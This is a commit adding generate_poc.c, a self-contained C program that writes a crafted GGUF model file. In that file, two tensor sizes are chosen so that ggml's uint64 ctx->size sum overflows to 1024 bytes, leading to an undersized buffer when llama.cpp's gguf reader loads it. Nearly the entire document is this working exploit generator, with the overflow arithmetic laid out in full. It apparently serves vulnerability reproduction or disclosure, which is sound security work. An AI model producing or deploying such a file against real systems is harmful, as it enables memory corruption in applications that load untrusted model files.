yuuoniy committed
Commit e220fdb · verified · 1 Parent(s): 07169aa

Create generate_poc.c

Files changed (1)
  1. generate_poc.c +308 -0
generate_poc.c ADDED
@@ -0,0 +1,308 @@
+ #include <inttypes.h>
+ #include <stdint.h>
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <string.h>
+
+ #ifndef GGML_MAX_DIMS
+ # define GGML_MAX_DIMS 4 // must match the value ggml itself uses (4 upstream)
+ #endif
+
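+ // Build/run note (added for convenience; any C99 compiler should do, since the
+ // PoC uses a VLA and // comments):
+ //   cc -std=c99 -o generate_poc generate_poc.c
+ //   ./generate_poc poc.gguf
+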
+ // --- BEGIN: Mimic ggml types and functions needed for the PoC ---
+ // These would ideally come from linking against ggml or including its headers,
+ // but to keep the PoC self-contained we define minimal versions here.
+
+ typedef enum {
+     POC_GGML_TYPE_F32 = 0,
+     POC_GGML_TYPE_F16 = 1,
+     POC_GGML_TYPE_Q4_0 = 2,
+     // ... other types if needed
+ } poc_ggml_type;
+
+ // Simplified function to mimic ggml_type_size
+ size_t poc_ggml_type_size(poc_ggml_type type) {
+     if (type == POC_GGML_TYPE_F16) {
+         return 2;
+     }
+     if (type == POC_GGML_TYPE_F32) {
+         return 4;
+     }
+     // Add other types as needed for your PoC
+     return 0; // Should not happen
+ }
+
+ // Simplified function to mimic ggml_blck_size
+ int poc_ggml_blck_size(poc_ggml_type type) {
+     // For unquantized types, the block size is 1
+     if (type == POC_GGML_TYPE_F16 || type == POC_GGML_TYPE_F32) {
+         return 1;
+     }
+     // Quantized types use larger blocks (e.g., Q4_0 packs 32 elements per block)
+     return 1; // Default; adjust if using quantized types
+ }
+
+ // CRUCIAL: This function needs to accurately reflect how ggml_nbytes computes a
+ // tensor's size, especially how it handles ne (int64_t) and type_size/blck_size.
+ // This is where the "expected 0x07..." vs "expected 0xE..." mystery came from.
+ // Based on the latest output, ggml computes it as (ne * type_size) / blck_size,
+ // where ne is int64_t; the multiplication promotes ne to uint64_t because
+ // type_size is a size_t (uint64_t on 64-bit targets).
+ size_t calculate_ggml_nbytes_in_poc(int64_t ne_dim0, poc_ggml_type type) {
+     if (ne_dim0 < 0) { // ggml_nelements would return INT64_MIN, which then fails an assert
+         // For the PoC, assume ne_dim0 is the valid total number of elements;
+         // if ggml_nelements itself would overflow, we would need to mimic that too.
+         return 0; // Or handle error
+     }
+     size_t ts = poc_ggml_type_size(type);
+     int bs = poc_ggml_blck_size(type);
+     if (bs == 0) {
+         return 0; // Avoid division by zero
+     }
+
+     // Mimic (ne * ts) / bs.
+     // In C, int64_t * uint64_t promotes the int64_t operand to uint64_t.
+     uint64_t ne_u = (uint64_t) ne_dim0;
+     uint64_t num = ne_u * ts; // Must not overflow uint64_t for our chosen ne_u and ts
+     return num / (uint64_t) bs;
+ }
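+
+ // Quick sanity check of the formula above (illustrative values, not part of the
+ // original PoC): 4 F16 elements -> (4 * 2) / 1 = 8 bytes.
+ //   calculate_ggml_nbytes_in_poc(4, POC_GGML_TYPE_F16) == 8
+ //   calculate_ggml_nbytes_in_poc(4, POC_GGML_TYPE_F32) == 16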
+
+ // --- END: Mimic ggml types ---
+
+ struct poc_gguf_tensor_info_header {
+     uint64_t name_len;
+     // The name bytes follow on disk; they are variable-length, so they are not
+     // part of this struct in the PoC.
+ };
+
+ struct poc_gguf_tensor_info_meta {
+     uint32_t n_dims;
+     int64_t  ne[GGML_MAX_DIMS];
+     uint32_t type;
+     uint64_t offset;
+ };
+
+ #define NUM_POC_TENSORS 2  // Let's try with 2 tensors first
+ #define ALIGNMENT       32 // Common GGUF alignment
+
+ uint64_t POC_GGML_PAD(uint64_t x, uint64_t align) {
+     return ((x + align - 1) / align) * align;
+ }
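+ // e.g. POC_GGML_PAD(0, 32) == 0, POC_GGML_PAD(1, 32) == 32,
+ //      POC_GGML_PAD(33, 32) == 64 (rounds up to the next multiple of align)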
+
+ // Define GGUF_VERSION if not available (e.g., from gguf.h)
+ #ifndef GGUF_VERSION
+ # define GGUF_VERSION 3 // Common version
+ #endif
+
+ int main(int ac, char ** av) {
+     if (ac != 2) {
+         printf("usage: %s <filename>\n", av[0]);
+         exit(1);
+     }
+
+     const char * filename = av[1];
+
+     uint32_t version       = GGUF_VERSION;
+     uint64_t n_tensors_val = NUM_POC_TENSORS;
+     uint64_t n_kv_val      = 0;
+
+     // --- Tensor design: overflow ctx->size to a SMALL value ---
+     // Objective: make ggml's final ctx->size (the sum of padded nbytes) small
+     // after the uint64_t sum wraps around:
+     //   final_ctx_size = (POC_GGML_PAD(nbytes0, ALIGNMENT) + POC_GGML_PAD(nbytes1, ALIGNMENT)) mod 2^64
+     // We want final_ctx_size to equal TARGET_CTX_SIZE_AFTER_OVERFLOW.
+
+     const uint64_t TARGET_CTX_SIZE_AFTER_OVERFLOW =
+         1024ULL; // Must be a multiple of ALIGNMENT; 1024 is fine for ALIGNMENT=32.
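+     // Worked example with the constants chosen below (illustrative):
+     //   padded_nbytes0        = 0xD000000000000000
+     //   target_padded_nbytes1 = 0x3000000000000400
+     //   sum                   = 0x1_0000000000000400 -> truncated to 64 bits
+     //                         = 0x0000000000000400    = 1024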
+
+     poc_ggml_type type0 = POC_GGML_TYPE_F16;
+     poc_ggml_type type1 = POC_GGML_TYPE_F16;
+     size_t ts0 = poc_ggml_type_size(type0);
+     size_t ts1 = poc_ggml_type_size(type1);
+
+     // Design nbytes0 so that POC_GGML_PAD(nbytes0, ALIGNMENT) is large
+     uint64_t nbytes0_target = 0xD000000000000000ULL;
+     // Ensure nbytes0_target is a multiple of ts0 and ALIGNMENT for simplicity
+     if (nbytes0_target % ts0 != 0) {
+         nbytes0_target = (nbytes0_target / ts0) * ts0;
+     }
+     if (nbytes0_target % ALIGNMENT != 0) { // Should not happen for 0xD...00 and ALIGNMENT=32
+         nbytes0_target = (nbytes0_target / ALIGNMENT) * ALIGNMENT;
+     }
+
+     int64_t ne0 = nbytes0_target / ts0;
+     size_t nbytes0 = calculate_ggml_nbytes_in_poc(ne0, type0); // Should equal nbytes0_target
+
+     uint64_t padded_nbytes0 = POC_GGML_PAD(nbytes0, ALIGNMENT);
+     printf("Target final ctx->size after overflow: 0x%" PRIx64 "\n", TARGET_CTX_SIZE_AFTER_OVERFLOW);
+     printf("Calculated ne0: %" PRId64 "\n", ne0);
+     printf("Designed nbytes0: 0x%" PRIx64 ", resulting padded_nbytes0: 0x%" PRIx64 "\n",
+            (uint64_t) nbytes0, padded_nbytes0);
+
+     // Design nbytes1 so (padded_nbytes0 + POC_GGML_PAD(nbytes1, ALIGNMENT)) wraps to the target:
+     //   POC_GGML_PAD(nbytes1, ALIGNMENT) = (UINT64_MAX - padded_nbytes0 + 1) + TARGET_CTX_SIZE_AFTER_OVERFLOW
+     uint64_t target_padded_nbytes1 = (0xFFFFFFFFFFFFFFFFULL - padded_nbytes0 + 1ULL) + TARGET_CTX_SIZE_AFTER_OVERFLOW;
+
+     // We want nbytes1 such that POC_GGML_PAD(nbytes1, ALIGNMENT) == target_padded_nbytes1.
+     // Choosing nbytes1 = target_padded_nbytes1 works as long as target_padded_nbytes1
+     // is a multiple of ALIGNMENT (it is, since padded_nbytes0 and
+     // TARGET_CTX_SIZE_AFTER_OVERFLOW are both multiples of ALIGNMENT).
+     uint64_t nbytes1_target = target_padded_nbytes1;
+     if (nbytes1_target % ts1 != 0) {
+         nbytes1_target = (nbytes1_target / ts1) * ts1; // Round down to a multiple of the type size
+         // This adjustment only ensures ne1 is an integer; the padding step still
+         // handles alignment. Recalculate target_padded_nbytes1 from the adjusted
+         // value if exact precision is critical.
+     }
+     if (nbytes1_target % ALIGNMENT != 0 && POC_GGML_PAD(nbytes1_target, ALIGNMENT) != target_padded_nbytes1) {
+         // If nbytes1_target itself does not pad up to target_padded_nbytes1, we
+         // would need nbytes1_target = target_padded_nbytes1 - k for some small k.
+         // For simplicity we assume nbytes1_target = target_padded_nbytes1 works,
+         // which holds when target_padded_nbytes1 is already aligned.
+         printf("Warning: nbytes1_target (0x%" PRIx64 ") might not pad exactly to target_padded_nbytes1 (0x%" PRIx64 ").\n",
+                nbytes1_target, target_padded_nbytes1);
+     }
+
+     int64_t ne1 = nbytes1_target / ts1;
+     if (ne1 <= 0) {
+         fprintf(stderr,
+                 "Error: Calculated ne1 (%" PRId64 ") is not positive. Adjust nbytes0_target or TARGET_CTX_SIZE_AFTER_OVERFLOW.\n",
+                 ne1);
+         exit(1);
+     }
+     size_t nbytes1 = calculate_ggml_nbytes_in_poc(ne1, type1); // Should ideally equal nbytes1_target
+
+     printf("Calculated ne1: %" PRId64 "\n", ne1);
+     printf("Designed nbytes1: 0x%" PRIx64 " (aiming for its padded version to be 0x%" PRIx64 ")\n",
+            (uint64_t) nbytes1, target_padded_nbytes1);
+
+     // The PoC calculates tm0.offset and tm1.offset to match what gguf.cpp
+     // expects based on its gguf_add_tensor logic:
+     //   tm0.offset = 0
+     //   tm1.offset = POC_GGML_PAD(nbytes0, ALIGNMENT)
+
+     FILE * fp = fopen(filename, "wb");
+     if (!fp) {
+         perror("Unable to write out file");
+         exit(1);
+     }
+
+     printf("[+] Writing GGUF header: %s\n", filename);
+     fwrite("GGUF", 4, 1, fp);
+     fwrite(&version, sizeof(version), 1, fp);
+     fwrite(&n_tensors_val, sizeof(n_tensors_val), 1, fp);
+     fwrite(&n_kv_val, sizeof(n_kv_val), 1, fp);
+
+     uint64_t calculated_offset_for_ggml = 0; // Mimics ggml's internal ctx->size
+
+     // --- Tensor 0 ---
+     char name0_str[] = "tensor_A";
+     struct poc_gguf_tensor_info_header th0;
+     struct poc_gguf_tensor_info_meta   tm0;
+     th0.name_len = strlen(name0_str);
+     tm0.n_dims   = 1;
+     tm0.ne[0]    = ne0;
+     tm0.type     = type0;
+     tm0.offset   = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT);
+
+     fwrite(&th0.name_len, sizeof(th0.name_len), 1, fp);
+     fwrite(name0_str, th0.name_len, 1, fp);
+     fwrite(&tm0.n_dims, sizeof(tm0.n_dims), 1, fp);
+     fwrite(tm0.ne, sizeof(tm0.ne[0]), tm0.n_dims, fp);
+     fwrite(&tm0.type, sizeof(tm0.type), 1, fp);
+     fwrite(&tm0.offset, sizeof(tm0.offset), 1, fp);
+     printf(" - Tensor 0 (name: %s, ne[0]: %" PRId64 ", type: %u, nbytes_calc: 0x%" PRIx64 ", offset_written: 0x%" PRIx64 ")\n",
+            name0_str, tm0.ne[0], tm0.type, (uint64_t) nbytes0, tm0.offset);
+
+     // Update the mirror of ggml's internal offset (ctx->size) calculation
+     calculated_offset_for_ggml = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT);
+     calculated_offset_for_ggml += nbytes0;
+     printf("   ggml's ctx->size after tensor 0 (before next pad): 0x%" PRIx64 "\n", calculated_offset_for_ggml);
+
+     // --- Tensor 1 ---
+     char name1_str[] = "tensor_B";
+     struct poc_gguf_tensor_info_header th1;
+     struct poc_gguf_tensor_info_meta   tm1;
+     th1.name_len = strlen(name1_str);
+     tm1.n_dims   = 1;
+     tm1.ne[0]    = ne1;
+     tm1.type     = type1;
+     tm1.offset   = POC_GGML_PAD(calculated_offset_for_ggml,
+                                 ALIGNMENT); // Offset based on the *correctly* calculated previous ctx->size
+
+     fwrite(&th1.name_len, sizeof(th1.name_len), 1, fp);
+     fwrite(name1_str, th1.name_len, 1, fp);
+     fwrite(&tm1.n_dims, sizeof(tm1.n_dims), 1, fp);
+     fwrite(tm1.ne, sizeof(tm1.ne[0]), tm1.n_dims, fp);
+     fwrite(&tm1.type, sizeof(tm1.type), 1, fp);
+     fwrite(&tm1.offset, sizeof(tm1.offset), 1, fp);
+     printf(" - Tensor 1 (name: %s, ne[0]: %" PRId64 ", type: %u, nbytes_calc: 0x%" PRIx64 ", offset_written: 0x%" PRIx64 ")\n",
+            name1_str, tm1.ne[0], tm1.type, (uint64_t) nbytes1, tm1.offset);
+
+     // Update the mirrored offset calculation (this sum should overflow)
+     uint64_t prev_calc_offset = calculated_offset_for_ggml;
+     calculated_offset_for_ggml = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT);
+     calculated_offset_for_ggml += nbytes1; // <<< POTENTIAL UINT64 OVERFLOW HERE
+     printf("   PoC's internal calculated_offset_for_ggml after tensor 1 (before next pad for a hypothetical T2): 0x%" PRIx64
+            " (prev was 0x%" PRIx64 ", added unpadded nbytes1 0x%" PRIx64 " to the padded sum)\n",
+            calculated_offset_for_ggml, prev_calc_offset, (uint64_t) nbytes1);
+     if (calculated_offset_for_ggml < POC_GGML_PAD(prev_calc_offset, ALIGNMENT) && nbytes1 > 0) {
+         // The sum came out smaller than what we started from, so it must have wrapped
+         printf("   >>>> UINT64 OVERFLOW DETECTED in PoC's internal calculated_offset_for_ggml sum <<<<\n");
+     }
+
+     // Verify the sum that gguf.cpp's ctx->size will actually be
+     uint64_t final_gguf_ctx_size_in_ggml_dot_cpp = POC_GGML_PAD(nbytes0, ALIGNMENT) + POC_GGML_PAD(nbytes1, ALIGNMENT);
+     printf("   EXPECTED FINAL gguf.cpp ctx->size (sum of padded nbytes): 0x%" PRIx64 "\n",
+            final_gguf_ctx_size_in_ggml_dot_cpp);
+     if (final_gguf_ctx_size_in_ggml_dot_cpp == TARGET_CTX_SIZE_AFTER_OVERFLOW) {
+         printf("   SUCCESS: EXPECTED FINAL gguf.cpp ctx->size matches TARGET_CTX_SIZE_AFTER_OVERFLOW (0x%" PRIx64 ")!\n",
+                TARGET_CTX_SIZE_AFTER_OVERFLOW);
+     } else {
+         printf("   MISMATCH: EXPECTED FINAL gguf.cpp ctx->size (0x%" PRIx64 ") != TARGET_CTX_SIZE_AFTER_OVERFLOW (0x%" PRIx64 ")!\n",
+                final_gguf_ctx_size_in_ggml_dot_cpp, TARGET_CTX_SIZE_AFTER_OVERFLOW);
+     }
+
+     // Pad the file to ALIGNMENT before writing the dummy tensor data blob.
+     // This ensures that gguf.cpp's fseek to the aligned data position does not
+     // skip parts of our dummy data.
+     long current_pos = ftell(fp);
+     long padded_pos  = (long) POC_GGML_PAD((uint64_t) current_pos, ALIGNMENT);
+     if (padded_pos > current_pos) {
+         char pad_bytes[ALIGNMENT] = { 0 }; // Max padding needed is ALIGNMENT-1 bytes
+         printf("   Padding file from %ld to %ld to align the data section.\n", current_pos, padded_pos);
+         fwrite(pad_bytes, 1, padded_pos - current_pos, fp);
+     }
+
+     char dummy_data_padding[TARGET_CTX_SIZE_AFTER_OVERFLOW]; // VLA (C99); initialized below via memset
+     // First, fill the whole blob with a pattern that would be unexpected if it
+     // were ever read back through tensor_B
+     memset(dummy_data_padding, 0xAA, sizeof(dummy_data_padding));
+
+     // Now fill the beginning of the blob for tensor_A (tensor[0]) with what
+     // gguf_ex_read_1 expects (100.0f for all of its elements). ne0 is far too
+     // large to fill completely, so fill just enough for the initial
+     // checks/prints in gguf_ex_read_1.
+     size_t num_elements_to_fill_for_tensor_a = 100; // Fill 100 floats for tensor_A
+     if (num_elements_to_fill_for_tensor_a * sizeof(float) > TARGET_CTX_SIZE_AFTER_OVERFLOW) {
+         num_elements_to_fill_for_tensor_a = TARGET_CTX_SIZE_AFTER_OVERFLOW / sizeof(float);
+     }
+
+     float tensor_a_expected_value = 100.0f;
+     for (size_t k = 0; k < num_elements_to_fill_for_tensor_a; ++k) {
+         if ((k + 1) * sizeof(float) <= sizeof(dummy_data_padding)) { // Boundary check
+             memcpy(&dummy_data_padding[k * sizeof(float)], &tensor_a_expected_value, sizeof(float));
+         } else {
+             break; // Stop if we run out of space in dummy_data_padding
+         }
+     }
+     printf("   Filled the first %zu float elements of dummy_data_padding with %f for tensor_A.\n",
+            num_elements_to_fill_for_tensor_a, tensor_a_expected_value);
+
+     fwrite(dummy_data_padding, 1, sizeof(dummy_data_padding), fp);
+
+     fclose(fp);
+     printf("[+] Finished writing PoC GGUF file.\n");
+     return 0;
+ }
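+
+ // Note (added): the comments above reference gguf_ex_read_1, the reader in
+ // llama.cpp's gguf example; loading the generated file there is presumably how
+ // the undersized ctx->size allocation is exercised. The exact harness and path
+ // are assumptions and may differ between llama.cpp revisions.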